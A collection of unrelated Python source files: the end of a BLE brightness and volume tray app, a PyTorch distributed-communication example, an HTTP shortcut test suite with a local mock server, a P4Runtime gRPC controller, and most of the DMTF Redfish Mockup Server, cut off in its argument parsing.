await client.subscribe(set_brightness, set_volume, on_disconnect)
await future
async def auto_adjust_daemon():
try:
await connect()
await auto_adjust_subscribe()
finally:
if client is not None:
sg.Window.QTApplication.exit()
_thread.interrupt_main()
client = NsBleClient()
loop = asyncio.new_event_loop()
thread = threading.Thread(target=loop.run_forever, daemon=True)
thread.start()
loop.call_soon_threadsafe(asyncio.create_task, auto_adjust_daemon())
brightness_points, volume_points, enabled = deserialize_calibration()
if start_in_background:
window = None
is_new_window = False
else:
window = make_window()
is_new_window = True
tray = make_tray()
no_refresh_until = {}
try:
while True:
await asyncio.sleep(0.01)
event, values = read(window, tray, 50 if window is not None else None)
update_slider_text(window, values)
if event in ['debug.apply']:
try:
brightness_points, volume_points, enabled = eval(values['debug'])
assert(list == type(brightness_points) == type(volume_points))
assert(dict == type(enabled))
apply_changes()
except Exception as e:
sg.PopupError(e)
if event in ['debug.logs']:
sg.PopupScrolled(logger.get(), size=(120, 50), title="Logs", non_blocking=True)
elif not check_slider_changes(event, values, no_refresh_until):
refresh_values(window, no_refresh_until)
if is_new_window:
is_new_window = False
apply_changes()
if window is not None:
if client is None or not client.is_connected:
set_title("not connected")
else:
set_title("")
if event != sg.TIMEOUT_EVENT:
# print(event, values)
if window is not None and client is not None:
if event in [sg.WIN_CLOSED]:
window.close()
window = None
if event in ["Calibrate display"] and client.is_connected:
await calibrate(client, brightness_points, None, enabled)
apply_changes()
show_popup()
if event in ["Calibrate audio"] and client.is_connected:
await calibrate(client, None, volume_points, enabled)
apply_changes()
show_popup()
if event in ["Clear"]:
if show_confirmation():
brightness_points = []
volume_points = []
apply_changes()
if event in values and type(values[event]) == bool:
enabled[event] = values[event]
apply_changes()
else:
if event in ["Configure", sg.EVENT_SYSTEM_TRAY_ICON_DOUBLE_CLICKED]:
window = make_window()
is_new_window = True
continue
if event in ["Exit"]:
break
finally:
tray.close()
if window is not None:
window.close()
if client is not None and client.is_connected:
disconnect = client.client.disconnect
client = None
await disconnect()
if __name__ == "__main__":
logger = Logger()
logger.attach()
from singleton import SingleInstance
me = SingleInstance()
background = any(sys.argv) in ['-b', '--background']
while True:
try:
asyncio.run(run(logger, background))
except KeyboardInterrupt:
print("Keyboard interrupt. Restarting in background...")
background = True
else:
sys.exit()
|
run.py | """run.py"""
#!/usr/bin/env python3
import os
import torch
import torch.distributed as dist
from torch.multiprocessing import Process
# blocking
def run_blocking(rank, size):
""" Blocking point-2-point communication """
tensor = torch.zeros(1)
if rank == 0:
tensor += 1
# Send the tensor to process 1
dist.send(tensor=tensor, dst=1)
else:
# Receive tensor from process 0
dist.recv(tensor=tensor, src=0)
print("Rank ", rank, ' has data ', tensor[0])
# non-blocking
def run_nonblocking(rank, size):
""" non-Blocking point-2-point communication """
tensor = torch.zeros(1)
req = None
if rank == 0:
tensor += 1
# Send the tensor to process 1
req = dist.isend(tensor=tensor, dst=1)
print("Rank 0 started sending")
else:
# Receive tensor from process 0
req = dist.irecv(tensor=tensor, src=0)
req.wait()
print("Rank ", rank, ' has data ', tensor[0])
# All-reduce
def run(rank, size):
""" simple E2E communication """
group = dist.new_group([0, 1])
tensor = torch.ones(1)
dist.all_reduce(tensor, op=torch.distributed.ReduceOp.SUM, group=group)
print("Rank ", rank, " has data ", tensor[0])
def init_process(rank, size, fn, backend='gloo'):
""" Initialize the distributed environment """
os.environ['MASTER_ADDR'] = '127.0.0.1'
os.environ['MASTER_PORT'] = '29500'
dist.init_process_group(backend, rank=rank, world_size=size)
fn(rank, size)
if __name__ == "__main__":
size = 2
processes = []
for rank in range(size):
p = Process(target=init_process, args=(rank, size, run))
p.start()
processes.append(p)
for p in processes:
p.join()
|
test_shortcut_sync_http.py | """
The MIT License (MIT)
Copyright (c) 2015 kelsoncm
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from unittest import TestCase
import socket
from zipfile import ZipFile, ZipInfo
from threading import Thread
from http.server import BaseHTTPRequestHandler, HTTPServer
from http.client import HTTPException
from python_brfied.shortcuts.sync_http import get, get_json, get_zip, get_zip_content, get_zip_csv_content, \
get_zip_fwf_content
from pyfwf.descriptors import FileDescriptor, HeaderRowDescriptor, DetailRowDescriptor
from pyfwf.columns import CharColumn
from tests import FILE01_CSV_EXPECTED, FILE01_CSV_EXPECTED_BINARY, FILE01_CSV_EXPECTED_LATIN1
from tests import FILE02_JSON_EXPECTED, FILE02_JSON_EXPECTED_BINARY, FILE02_JSON_EXPECTED_LATIN1
from tests import ZIP_EXPECTED, JSON_EXPECTED, CSV_EXPECTED
from tests import FWF_EXPECTED, FILE_DESCRIPTOR
def get_free_port():
s = socket.socket(socket.AF_INET, type=socket.SOCK_STREAM)
s.bind(('localhost', 0))
address, port = s.getsockname()
s.close()
return port
class MockServerRequestHandler(BaseHTTPRequestHandler):
with open("assets/file01.csv", "rb") as f:
file01_csv = f.read()
with open("assets/file01.zip", "rb") as f:
file01_zip = f.read()
with open("assets/file02.json", "rb") as f:
file02_json = f.read()
with open("assets/file02.zip", "rb") as f:
file02_zip = f.read()
with open("assets/example01_are_right.fwf.zip", "rb") as f:
example01_are_right_fwf_zip = f.read()
files = {'file01_csv': file01_csv, 'file01_zip': file01_zip, 'file02_json': file02_json, 'file02_zip': file02_zip,
"example01_are_right.fwf.zip": example01_are_right_fwf_zip}
FILE_NOT_FOUND_ERROR_MESSAGE = 'File not found'
def __init__(self, request, client_address, server):
super(MockServerRequestHandler, self).__init__(request, client_address, server)
def log_error(self, format, *args):
# super(MockServerRequestHandler, self).log_message(format, *args)
pass
def log_message(self, format, *args):
pass
def do_GET(self):
parts = self.path.split('/')
prop = parts[len(parts)-1]
if prop not in MockServerRequestHandler.files:
self.send_error(404, MockServerRequestHandler.FILE_NOT_FOUND_ERROR_MESSAGE)
return
# Add response status code.
self.send_response(200)
# Add response headers.
# self.send_header('Content-Type', 'application/json; charset=utf-8')
self.end_headers()
# Add response content.
self.wfile.write(MockServerRequestHandler.files[prop])
return
class TestPythonBrfiedShortcutSyncHttp(TestCase):
def setUp(self):
self.port = TestPythonBrfiedShortcutSyncHttp.mock_server_port
self.file_not_found = "http://localhost:%d/file_not_found" % self.port
self.file01_csv_url = "http://localhost:%d/file01_csv" % self.port
self.file01_zip_url = "http://localhost:%d/file01_zip" % self.port
self.file02_json_url = "http://localhost:%d/file02_json" % self.port
self.file02_zip_url = "http://localhost:%d/file02_zip" % self.port
self.example01_are_right_fwf_zip_url = "http://localhost:%d/example01_are_right.fwf.zip" % self.port
@classmethod
def setUpClass(cls):
# https://realpython.com/testing-third-party-apis-with-mock-servers/
# Configure mock server.
cls.mock_server_port = get_free_port()
cls.mock_server = HTTPServer(('localhost', cls.mock_server_port), MockServerRequestHandler)
# Start running mock server in a separate thread.
# Daemon threads automatically shut down when the main process exits.
cls.mock_server_thread = Thread(target=cls.mock_server.serve_forever)
cls.mock_server_thread.setDaemon(True)
cls.mock_server_thread.start()
# @httpretty.activate
def test_get(self):
self.assertRaisesRegex(HTTPException, MockServerRequestHandler.FILE_NOT_FOUND_ERROR_MESSAGE,
get, self.file_not_found)
try:
self.assertIsNotNone(get(self.file_not_found))
except Exception as exc:
self.assertEqual(404, getattr(exc, 'status', None))
self.assertEqual('File not found', getattr(exc, 'reason', None))
self.assertTrue('Content-Type' in getattr(exc, 'headers'))
self.assertEqual(self.file_not_found, getattr(exc, 'url', None))
self.assertRaises(UnicodeDecodeError, get, self.file01_zip_url, None)
self.assertEqual(FILE01_CSV_EXPECTED, get(self.file01_csv_url))
self.assertEqual(FILE01_CSV_EXPECTED_BINARY, get(self.file01_csv_url, encoding=None))
self.assertEqual(FILE01_CSV_EXPECTED_LATIN1, get(self.file01_csv_url, encoding='latin1'))
self.assertEqual(FILE02_JSON_EXPECTED, get(self.file02_json_url))
self.assertEqual(FILE02_JSON_EXPECTED_BINARY, get(self.file02_json_url, encoding=None))
self.assertEqual(FILE02_JSON_EXPECTED_LATIN1, get(self.file02_json_url, encoding='latin1'))
self.assertEqual(ZIP_EXPECTED, get(self.file01_zip_url, encoding=None))
self.assertEqual('file.csv', get_zip(self.file01_zip_url).filelist[0].filename)
def test_get_ftp(self):
self.assertEqual("04/09/2012 12:24:13\r\n", get("ftp://ftp.datasus.gov.br/cnes/informe_cnes.txt"))
def test_get_json(self):
self.assertEqual(JSON_EXPECTED, get_json(self.file02_json_url))
def test_get_zip(self):
self.assertIsInstance(get_zip(self.file01_zip_url), ZipFile)
self.assertIsInstance(get_zip(self.file01_zip_url).filelist[0], ZipInfo)
self.assertEqual('file.csv', get_zip(self.file01_zip_url).filelist[0].filename)
def test_get_zip_content(self):
self.assertEqual(FILE01_CSV_EXPECTED, get_zip_content(self.file01_zip_url))
def test_get_zip_content_ftp(self):
with open("assets/IMPORT_201711.txt") as f:
expected = f.read()
self.assertEqual(expected, get_zip_content("ftp://ftp.datasus.gov.br/cnes/IMPORT_201711.ZIP").replace("\r", ""))
def test_get_zip_csv_content(self):
self.assertEqual(CSV_EXPECTED, get_zip_csv_content(self.file01_zip_url, unzip_kwargs={"delimiter": ';'}))
def test_get_zip_fwf_content(self):
self.assertEqual(FWF_EXPECTED, get_zip_fwf_content(self.example01_are_right_fwf_zip_url, FILE_DESCRIPTOR,
newline="\n"))
|
controller.py | #!/usr/bin/env python2
# Copyright 2018-present University of Tuebingen, Chair of Communication Networks
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Marco Haeberle (marco.haeberle@uni-tuebingen.de)
#
#
import grpc
from concurrent import futures
import time
import sys
import threading
import argparse
import cli
# import generated proto classes
import topo_pb2, topo_pb2_grpc
import topo_server
import control_client
# define some variables
ca_path = '../tools/certstrap/out/p4sec-ca.crt'
cert_path = '../tools/certstrap/out/localhost.crt'
key_path = '../tools/certstrap/out/localhost.key'
listen_addr = '0.0.0.0:51001'
def start_topo_server(topo, control_client):
# create a gRPC server
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
topo_pb2_grpc.add_TopoServiceServicer_to_server(topo_server.TopoServer(topo, control_client), server)
# prepare tls creds
try:
with open(ca_path, 'rb') as ca_file:
ca = ca_file.read()
except IOError as e:
print(e)
sys.exit("Error opening CA file")
try:
with open(cert_path, 'rb') as cert_file:
cert = cert_file.read()
except IOError as e:
print(e)
sys.exit("Error opening cert file")
try:
with open(key_path, 'rb') as key_file:
key = key_file.read()
except IOError as e:
print(e)
sys.exit("Error opening key file")
server_creds = grpc.ssl_server_credentials([(key, cert)], ca, True)
# listen on port 50051
print('Starting gRPC server for clients. Listening on ' + listen_addr)
server.add_secure_port(listen_addr, server_creds)
server.start()
# server.start() does not block -> sleep-loop to keep the server alive
while True:
time.sleep(100)
def start_cli(topo, control_client):
print('starting cli')
cmd = cli.CLI()
cmd.set_topo(topo)
cmd.set_control_client(control_client)
cmd.cmdloop()
# parser = argparse.ArgumentParser(description='P4Runtime Controller')
# parser.add_argument('--p4info', help='p4info proto in text format from p4c', type=str, action="store", required=False,
# default='../p4/p4/build/basic.p4info')
# parser.add_argument('--bmv2-json', help='BMv2 JSON file from p4c', type=str, action="store", required=False,
# default='../p4/p4/build/basic.json')
# args = parser.parse_args()
control_client = control_client.ControlClient(ca_path, cert_path, key_path)
topo = {}
topo_t = threading.Thread(target=start_topo_server, args=(topo,control_client))
topo_t.daemon = True
topo_t.start()
cli_t = threading.Thread(target=start_cli, args=(topo, control_client))
cli_t.daemon = True
cli_t.start()
# exit when CTRL-C ist pressed or when the CLI is stopped by entering 'exit'
try:
while cli_t.is_alive():
time.sleep(1)
except KeyboardInterrupt:
print('shutting down')
sys.exit(0)
|
redfishMockupServer.py | # Copyright Notice:
# Copyright 2016-2019 DMTF. All rights reserved.
# License: BSD 3-Clause License. For full text see link: https://github.com/DMTF/Redfish-Mockup-Server/blob/master/LICENSE.md
# redfishMockupServer.py
# tested and developed Python 3.4
import sys
import argparse
import time
import collections
import json
import threading
import datetime
import grequests
import os
import ssl
import logging
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, urlunparse, parse_qs
from rfSsdpServer import RfSDDPServer
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler(sys.stdout)
ch.setLevel(logging.INFO)
logger.addHandler(ch)
tool_version = "1.0.8"
dont_send = ["connection", "keep-alive", "content-length", "transfer-encoding"]
def dict_merge(dct, merge_dct):
"""
https://gist.github.com/angstwad/bf22d1822c38a92ec0a9 modified
Recursive dict merge. Inspired by :meth:``dict.update()``, instead of
updating only top-level keys, dict_merge recurses down into dicts nested
to an arbitrary depth, updating keys. The ``merge_dct`` is merged into
``dct``.
:param dct: dict onto which the merge is executed
:param merge_dct: dct merged into dct
:return: None
"""
for k in merge_dct:
if (k in dct and isinstance(dct[k], dict) and isinstance(merge_dct[k], collections.Mapping)):
dict_merge(dct[k], merge_dct[k])
else:
dct[k] = merge_dct[k]
def clean_path(path, isShort):
"""clean_path
:param path:
:param isShort:
"""
path = path.strip('/')
path = path.split('?', 1)[0]
path = path.split('#', 1)[0]
if isShort:
path = path.replace('redfish/v1', '').strip('/')
return path
class RfMockupServer(BaseHTTPRequestHandler):
'''
returns index.json file for Serverthe specified URL
'''
patchedLinks = dict()
def construct_path(self, path, filename):
"""construct_path
:param path:
:param filename:
"""
apath = self.server.mockDir
rpath = clean_path(path, self.server.shortForm)
return '/'.join([ apath, rpath, filename ]) if filename not in ['', None] else '/'.join([ apath, rpath ])
def get_cached_link(self, path):
"""get_cached_link
:param path:
"""
if path not in self.patchedLinks:
if os.path.isfile(path):
with open(path) as f:
jsonData = json.load(f)
f.close()
else:
jsonData = None
else:
jsonData = self.patchedLinks[path]
return jsonData is not None and jsonData != '404', jsonData
def try_to_sleep(self, method, path):
"""try_to_sleep
:param method:
:param path:
"""
if self.server.timefromJson:
responseTime = self.getResponseTime(method, path)
try:
time.sleep(float(responseTime))
except ValueError as e:
logger.info("Time is not a float value. Sleeping with default response time")
time.sleep(float(self.server.responseTime))
else:
time.sleep(float(self.server.responseTime))
def send_header_file(self, fpath):
"""send_header_file
:param fpath:
"""
with open(fpath) as headers_data:
d = json.load(headers_data)
if isinstance(d.get("GET"), dict):
for k, v in d["GET"].items():
if k.lower() not in dont_send:
self.send_header(k, v)
def add_new_member(self, payload, data_received):
members = payload.get('Members')
n = 1
newpath_id = data_received.get('Id', 'Member')
newpath = '/'.join([ self.path, newpath_id ])
while newpath in [m.get('@odata.id') for m in members]:
n = n + 1
newpath_id = data_received.get('Id', 'Member') + str(n)
newpath = '/'.join([ self.path, newpath_id ])
members.append({'@odata.id': newpath})
payload['Members'] = members
payload['Members@odata.count'] = len(members)
return newpath
def handle_eventing(self, data_received):
sub_path = self.construct_path('/redfish/v1/EventService/Subscriptions', 'index.json')
success, sub_payload = self.get_cached_link(sub_path)
logger.info(sub_path)
if not success:
# Eventing not supported
return (404)
else:
# Check if all of the parameters are given
if ( ('EventType' not in data_received) or ('EventId' not in data_received) or
('EventTimestamp' not in data_received) or ('Severity' not in data_received) or
('Message' not in data_received) or ('MessageId' not in data_received) or
('MessageArgs' not in data_received) or ('OriginOfCondition' not in data_received) ):
return (400)
else:
# Need to reformat to make Origin Of Condition a proper link
origin_of_cond = data_received['OriginOfCondition']
data_received['OriginOfCondition'] = {}
data_received['OriginOfCondition']['@odata.id'] = origin_of_cond
event_payload = {}
event_payload['@odata.type'] = '#Event.v1_2_1.Event'
event_payload['Name'] = 'Test Event'
event_payload['Id'] = str(self.event_id)
event_payload['Events'] = []
event_payload['Events'].append(data_received)
# Go through each subscriber
events = []
for member in sub_payload.get('Members', []):
entry = member['@odata.id']
entrypath = self.construct_path(entry, 'index.json')
success, subscription = self.get_cached_link(entrypath)
if not success:
logger.info('No such resource')
else:
# Sanity check the subscription for required properties
if ('Destination' in subscription) and ('EventTypes' in subscription):
logger.info(('Target', subscription['Destination']))
logger.info((data_received['EventType'], subscription['EventTypes']))
# If the EventType in the request is one of interest to the subscriber, build an event payload
if data_received['EventType'] in subscription['EventTypes']:
http_headers = {}
http_headers['Content-Type'] = 'application/json'
event_payload['Context'] = subscription.get('Context', 'Default Context')
# Send the event
events.append(grequests.post(subscription['Destination'], timeout=20, data=json.dumps(event_payload), headers=http_headers))
else:
logger.info('event not in eventtypes')
try:
threading.Thread(target=grequests.map, args=(events,)).start()
except Exception as e:
logger.info('post error {}'.format( str(e)))
return (204)
self.event_id = self.event_id + 1
def handle_telemetry(self, data_received):
sub_path = self.construct_path('/redfish/v1/EventService/Subscriptions', 'index.json')
success, sub_payload = self.get_cached_link(sub_path)
logger.info(sub_path)
if not success:
# Eventing not supported
return (404)
else:
# Check if all of the parameters are given
if (('MetricReportName' in data_received) and ('MetricReportValues' in data_received)) or\
(('MetricReportName' in data_received) and ('GeneratedMetricReportValues' in data_received)) or\
(('MetricName' in data_received) and ('MetricValues' in data_received)):
# If the EventType in the request is one of interest to the subscriber, build an event payload
expected_keys = ['MetricId', 'MetricValue', 'Timestamp', 'MetricProperty', 'MetricDefinition']
other_keys = ['MetricProperty']
my_name = data_received.get('MetricName',
data_received.get('MetricReportName'))
my_data = data_received.get('MetricValues',
data_received.get('MetricReportValues',
data_received.get('GeneratedMetricReportValues')))
event_payload = {}
value_list = []
# event_payload['@Redfish.Copyright'] = 'Copyright 2014-2016 Distributed Management Task Force, Inc. (DMTF). All rights reserved.'
event_payload['@odata.context'] = '/redfish/v1/$metadata#MetricReport.MetricReport'
event_payload['@odata.type'] = '#MetricReport.v1_0_0.MetricReport'
event_payload['@odata.id'] = '/redfish/v1/TelemetryService/MetricReports/' + my_name
event_payload['Id'] = my_name
event_payload['Name'] = my_name
event_payload['MetricReportDefinition'] = {
"@odata.id": "/redfish/v1/TelemetryService/MetricReportDefinitions/" + my_name}
now = datetime.datetime.now()
event_payload['Timestamp'] = now.strftime('%Y-%m-%dT%H:%M:%S') + ('-%02d' % (now.microsecond / 10000))
for tup in my_data:
if all(x in tup for x in expected_keys):
# uncomment for stricter payload check
# ex: if all(x in expected_keys + other_keys for x in tup):
value_list.append(tup)
event_payload['MetricValues'] = value_list
logger.info(event_payload)
# construct path "mockdir/path/to/resource/<filename>"
event_fpath = self.construct_path(event_payload['@odata.id'], 'index.json')
self.patchedLinks[event_fpath] = event_payload
report_path = '/redfish/v1/TelemetryService/MetricReports'
report_path = self.construct_path(report_path, 'index.json')
success, collection_payload = self.get_cached_link(report_path)
if not success:
collection_payload = {'Members': []}
collection_payload['@odata.context'] = '/redfish/v1/$metadata#MetricReportCollection.MetricReportCollection'
collection_payload['@odata.type'] = '#MetricReportCollection.v1_0_0.MetricReportCollection'
collection_payload['@odata.id'] = '/redfish/v1/TelemetryService/MetricReports'
collection_payload['Name'] = 'MetricReports'
if event_payload['@odata.id'] not in [member.get('@odata.id') for member in collection_payload['Members']]:
collection_payload['Members'].append({'@odata.id': event_payload['@odata.id']})
collection_payload['Members@odata.count'] = len(collection_payload['Members'])
self.patchedLinks[report_path] = collection_payload
# Go through each subscriber
events = []
for member in sub_payload.get('Members', []):
entry = member['@odata.id']
entrypath = self.construct_path(entry, 'index.json')
success, subscription = self.get_cached_link(entrypath)
if not success:
logger.info('No such resource')
else:
# Sanity check the subscription for required properties
if ('Destination' in subscription) and ('EventTypes' in subscription):
logger.info(('Target', subscription['Destination']))
http_headers = {}
http_headers['Content-Type'] = 'application/json'
# Send the event
events.append(grequests.post(subscription['Destination'], timeout=20, data=json.dumps(event_payload), headers=http_headers))
else:
logger.info('event not in eventtypes')
try:
threading.Thread(target=grequests.map, args=(events,)).start()
except Exception as e:
logger.info('post error {}'.format( str(e)))
self.event_id = self.event_id + 1
return (204)
else:
return (400)
server_version = "RedfishMockupHTTPD_v" + tool_version
event_id = 1
# Headers only request
def do_HEAD(self):
"""do_HEAD"""
logger.info("Headers: ")
logger.info(self.server.headers)
# construct path "mockdir/path/to/resource/headers.json"
fpath = self.construct_path(self.path, 'index.json')
fpath_xml = self.construct_path(self.path, 'index.xml')
fpath_headers = self.construct_path(self.path, 'headers.json')
fpath_direct = self.construct_path(self.path, '')
# If bool headers is true and headers.json exists...
# else, send normal headers for given resource
if self.server.headers and (os.path.isfile(fpath_headers)):
self.send_response(200)
self.send_header_file(fpath_headers)
elif (self.server.headers is False) or (os.path.isfile(fpath_headers) is False):
if self.get_cached_link(fpath)[0]:
self.send_response(200)
self.send_header("Content-Type", "application/json")
self.send_header("OData-Version", "4.0")
elif os.path.isfile(fpath_xml) or os.path.isfile(fpath_direct):
if os.path.isfile(fpath_xml):
file_extension = 'xml'
elif os.path.isfile(fpath_direct):
filename, file_extension = os.path.splitext(fpath_direct)
file_extension = file_extension.strip('.')
self.send_response(200)
self.send_header("Content-Type", "application/" + file_extension + ";odata.metadata=minimal;charset=utf-8")
self.send_header("OData-Version", "4.0")
else:
self.send_response(404)
else:
self.send_response(404)
self.end_headers()
def do_GET(self):
"""do_GET"""
# for GETs always dump the request headers to the console
# there is no request data, so no need to dump that
logger.info(("GET", self.path))
logger.info(" GET: Headers: {}".format(self.headers))
# construct path "mockdir/path/to/resource/<filename>"
fpath = self.construct_path(self.path, 'index.json')
fpath_xml = self.construct_path(self.path, 'index.xml')
fpath_headers = self.construct_path(self.path, 'headers.json')
fpath_direct = self.construct_path(self.path, '')
success, payload = self.get_cached_link(fpath)
scheme, netloc, path, params, query, fragment = urlparse(self.path)
query_pieces = parse_qs(query, keep_blank_values=True)
self.try_to_sleep('GET', self.path)
# handle resource paths that don't exist for shortForm
# '/' and '/redfish'
if(self.path == '/' and self.server.shortForm):
self.send_response(404)
self.end_headers()
elif(self.path in ['/redfish', '/redfish/'] and self.server.shortForm):
self.send_response(200)
if self.server.headers and (os.path.isfile(fpath_headers)):
self.send_header_file(fpath_headers)
else:
self.send_header("Content-Type", "application/json")
self.send_header("OData-Version", "4.0")
self.end_headers()
self.wfile.write(json.dumps({'v1': '/redfish/v1'}, indent=4).encode())
# if this location exists in memory or as file
elif(success):
# if headers exist... send information (except for chunk info)
# end headers here (always end headers after response)
self.send_response(200)
if self.server.headers and (os.path.isfile(fpath_headers)):
self.send_header_file(fpath_headers)
else:
self.send_header("Content-Type", "application/json")
self.send_header("OData-Version", "4.0")
self.end_headers()
# Strip the @Redfish.Copyright property
output_data = payload
output_data.pop("@Redfish.Copyright", None)
# Query evaluate
if output_data.get('Members') is not None:
my_members = output_data['Members']
top_count = int(query_pieces.get('$top', [str(len(my_members))])[0])
top_skip = int(query_pieces.get('$skip', ['0'])[0])
my_members = my_members[top_skip:]
if top_count < len(my_members):
my_members = my_members[:top_count]
query_out = {'$skip': top_skip + top_count, '$top': top_count}
query_string = '&'.join(['{}={}'.format(k, v) for k, v in query_out.items()])
output_data['Members@odata.nextLink'] = urlunparse(('', '', path, '', query_string, ''))
else:
pass
output_data['Members'] = my_members
pass
encoded_data = json.dumps(output_data, sort_keys=True, indent=4, separators=(",", ": ")).encode()
self.wfile.write(encoded_data)
# if XML...
elif(os.path.isfile(fpath_xml) or os.path.isfile(fpath_direct)):
if os.path.isfile(fpath_xml):
file_extension = 'xml'
f = open(fpath_xml, "r")
elif os.path.isfile(fpath_direct):
filename, file_extension = os.path.splitext(fpath_direct)
file_extension = file_extension.strip('.')
f = open(fpath_direct, "r")
self.send_response(200)
self.send_header("Content-Type", "application/" + file_extension + ";odata.metadata=minimal;charset=utf-8")
self.send_header("OData-Version", "4.0")
self.end_headers()
self.wfile.write(f.read().encode())
f.close()
else:
self.send_response(404)
self.end_headers()
def do_PATCH(self):
logger.info(" PATCH: Headers: {}".format(self.headers))
self.try_to_sleep('PATCH', self.path)
if("content-length" in self.headers):
lenn = int(self.headers["content-length"])
try:
data_received = json.loads(self.rfile.read(lenn).decode("utf-8"))
except ValueError:
print ('Decoding JSON has failed, sending 400')
data_received = None
if data_received:
logger.info(" PATCH: Data: {}".format(data_received))
# construct path "mockdir/path/to/resource/<filename>"
fpath = self.construct_path(self.path, 'index.json')
success, payload = self.get_cached_link(fpath)
# check if resource exists, otherwise 404
# if it's a file, open it, if its in memory, grab it
# 405 if Collection
# 204 if patch success
# 404 if payload DNE
# 400 if no patch payload
# end headers
if success:
# If this is a collection, throw a 405
if payload.get('Members') is not None:
self.send_response(405)
else:
# After getting resource, merge the data.
logger.info(self.headers.get('content-type'))
logger.info(data_received)
logger.info(payload)
dict_merge(payload, data_received)
logger.info(payload)
# put into self.patchedLinks
self.patchedLinks[fpath] = payload
self.send_response(204)
else:
self.send_response(404)
else:
self.send_response(400)
self.end_headers()
def do_PUT(self):
logger.info(" PUT: Headers: {}".format(self.headers))
self.try_to_sleep('PUT', self.path)
if("content-length" in self.headers):
lenn = int(self.headers["content-length"])
try:
data_received = json.loads(self.rfile.read(lenn).decode("utf-8"))
except ValueError:
print ('Decoding JSON has failed, sending 400')
data_received = None
logger.info(" PUT: Data: {}".format(data_received))
# we don't support this service
# 405
# end headers
self.send_response(405)
self.end_headers()
def do_POST(self):
logger.info(" POST: Headers: {}".format(self.headers))
if("content-length" in self.headers):
lenn = int(self.headers["content-length"])
try:
data_received = json.loads(self.rfile.read(lenn).decode("utf-8"))
except ValueError:
print ('Decoding JSON has failed, sending 405')
data_received = None
self.try_to_sleep('POST', self.path)
if data_received:
logger.info(" POST: Data: {}".format(data_received))
# construct path "mockdir/path/to/resource/<filename>"
fpath = self.construct_path(self.path, 'index.json')
success, payload = self.get_cached_link(fpath)
# don't bother if this item exists, otherwise, check if its an action or a file
# if file
# 405 if not Collection
# 204 if success
# 404 if no file present
if success:
if payload.get('Members') is None:
self.send_response(405)
else:
logger.info(data_received)
logger.info(type(data_received))
# with members, form unique ID
# must NOT exist in Members
# add ID to members, change count
# store as necessary in self.patchedLinks
newpath = self.add_new_member(payload, data_received)
newfpath = self.construct_path(newpath, 'index.json')
logger.info(newfpath)
self.patchedLinks[newfpath] = data_received
self.patchedLinks[fpath] = payload
self.send_response(204)
self.send_header("Location", newpath)
self.send_header("Content-Length", "0")
self.end_headers()
# eventing framework
else:
if 'EventService/Actions/EventService.SubmitTestEvent' in self.path:
r_code = self.handle_eventing(data_received)
self.send_response(r_code)
elif 'TelemetryService/Actions/TelemetryService.SubmitTestMetricReport' in self.path:
r_code = self.handle_telemetry(data_received)
self.send_response(r_code)
else:
self.send_response(404)
else:
self.send_response(405)
self.end_headers()
def do_DELETE(self):
"""
Delete a resource
"""
logger.info("DELETE: Headers: {}".format(self.headers))
self.try_to_sleep('DELETE', self.path)
fpath = self.construct_path(self.path, 'index.json')
ppath = '/'.join(self.path.split('/')[:-1])
parent_path = self.construct_path(ppath, 'index.json')
success, payload = self.get_cached_link(fpath)
# 404 if file doesn't exist
# 204 if success, override payload with 404
# modify payload to exclude expected URI, subtract count
# 405 if parent is not Collection
# end headers
if success:
success, parentData = self.get_cached_link(parent_path)
if success and parentData.get('Members') is not None:
self.patchedLinks[fpath] = '404'
parentData['Members'] = [x for x in parentData['Members'] if not x['@odata.id'] == self.path]
parentData['Members@odata.count'] = len(parentData['Members'])
self.patchedLinks[parent_path] = parentData
self.send_response(204)
else:
self.send_response(405)
else:
self.send_response(404)
self.end_headers()
# Response time calculation Algorithm
def getResponseTime(self, method, path):
fpath = self.construct_path(path, 'time.json')
success, item = self.get_cached_link(path)
if not any(x in method for x in ("GET", "HEAD", "POST", "PATCH", "DELETE")):
logger.info("Not a valid method")
return (0)
if(os.path.isfile(fpath)):
with open(fpath) as time_data:
d = json.load(time_data)
time_str = method + "_Time"
if time_str in d:
try:
float(d[time_str])
except Exception as e:
logger.info(
"Time in the json file, not a float/int value. Reading the default time.")
return (self.server.responseTime)
return (float(d[time_str]))
else:
logger.info(('response time:', self.server.responseTime))
return (self.server.responseTime)
def main():
logger.info("Redfish Mockup Server, version {}".format(tool_version))
parser = argparse.ArgumentParser(description='Serve a static Redfish mockup.')
parser.add_argument('-H', '--host', '--Host', default='127.0.0.1',
help='hostname or IP address (default 127.0.0.1)')
parser.add_argument('-p', '--port', '--Port', default=8000, type=int,
help='host port (default 8000)')
parser.add_argument('-D', '--dir', '--Dir',
help='path to mockup dir (may be relative to CWD)')
parser.add_argument('-E', '--test-etag', '--TestEtag',
action='store_true',
help='(unimplemented) etag testing')
parser.add_argument('-X', '--headers', action='store_true',
help='load headers from headers.json files in mockup')
parser.add_argument('-t', '--time', default=0,
help='delay in seconds added to responses (float or int)')
parser.add_argument('-T', action='store_true',
help='delay response based on times in time.json files in mockup')
parser.add_argument('-s', '--ssl', action='store_true',
help='place server in SSL (HTTPS) mode; requires a cert and key')
